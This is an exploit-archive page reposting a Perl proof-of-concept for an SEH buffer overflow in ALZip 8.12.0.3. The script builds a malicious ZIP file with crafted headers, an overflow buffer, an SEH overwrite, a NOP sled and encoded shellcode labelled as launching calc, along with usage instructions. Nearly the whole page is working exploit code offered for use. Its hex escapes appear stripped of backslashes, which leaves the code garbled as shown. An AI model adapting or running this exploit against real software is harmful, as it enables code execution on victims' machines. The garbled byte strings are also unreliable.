Home / os / win7

ALZip 8.12.0.3 Buffer Overflow

Posted on 19 January 2011

#
#
#[+]Exploit Title: Exploit Buffer Overflow AlZip(SEH)
#[+]Date: 01192010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.altools.com/al/downloads/alzip/ALZip812.exe
#[+]Version: 8.12.0.3
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#
#Note:Exploit for the work you have to run program in DOS
#
#C: > Exploit.pl exploit.zip
#
#In this case my Exploit Creates the zip file exploit.zip
#In the open ALZip Click "OPEN"pass the mouse over the specially crafted file and
#keeps the mouse on top of the file does not click on it and wait then BOOM APPEARS THE CALC
#
#Watch This Video: http://www.youtube.com/watch?v=PTV_tZinI6w
#
#
#  #########     ##    #########      #########   ##     ###############
#   ########    ####    #########      #########   ##     ##           ##
#   ##         ## ##    ##             ##          ##     ##           ##
#   ##        ##  ##    ##             ##          ##     ##           ##
#   ##       ########## ########       ########    ##     ##           ##
#   ##            ##          ##             ##    ##     ##           ##
#   ##            ##          ##             ##    ##     ##           ##
#   ########      ##    ########      #########    ##     ##           ##
#   ########      ##    ########      #########    /     ###############
#
#
#
#

use strict;
use warnings;

system("cls");
system("color 4f");
sub USAGE
{
print q
{
#############################################
#                                           #
#  Exploit Buffer Overflow AlZip(SEH)       #
#  C4SS!0 G0M3S                             #
#  Louredo_@hotmail.com                     #
#  Site http://www.invasao.com.br           #
#                                       #
#############################################

[+]Exploit: Exploit Buffer Overflow AlZip(SEH)
[+]Date: 01\19\2010
[+]Auhtor: C4SS!0 G0M3S
[+]Home: http://www.invasao.com.br
[+]E-mail: Louredo_@hotmail.com
[+]Version: 8.12.0.3
[+]Impact: Critical

Note:
Look Comments Above for More Information as the Exploit Works

};
}
if($#ARGV!=0)
{
USAGE;
print "[-]Usage: $0 <File_Name>
";
print "[-]Exemple: $0 Exploit.zip
";

exit(0);
}
my $sploitfile=$ARGV[0];
my $ldf_header = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

my $cdf_header = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $eofcdf_header = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";
USAGE;
print "[*]Identifying the Length Shellcode
";
sleep(1);
my $shellcode =
"xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .#Shellcode WINEXEC CALC
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";


my $payload = "A" x 1060;
$payload .= "xebx08x90x90";
$payload .= pack('V',0x61309258);
$payload .= "x90" x 10;
$payload .= $shellcode;


print "[*]The length Shellcode:".length($shellcode)."
";
sleep(1);
$payload .= "x42" x (4064 - length($payload));


$payload=$payload.".txt";

my $evilzip = $ldf_header.$payload.
$cdf_header.$payload.
$eofcdf_header;

print "[*]Creating the File $ARGV[0]
";
sleep(1);
open(FILE,">$sploitfile") or die("ERROR:$!");
print FILE $evilzip;
close(FILE);
print "[*]The File $ARGV[0] was Successfully Created
";
sleep(1);

 

TOP

Malware :

Exploits :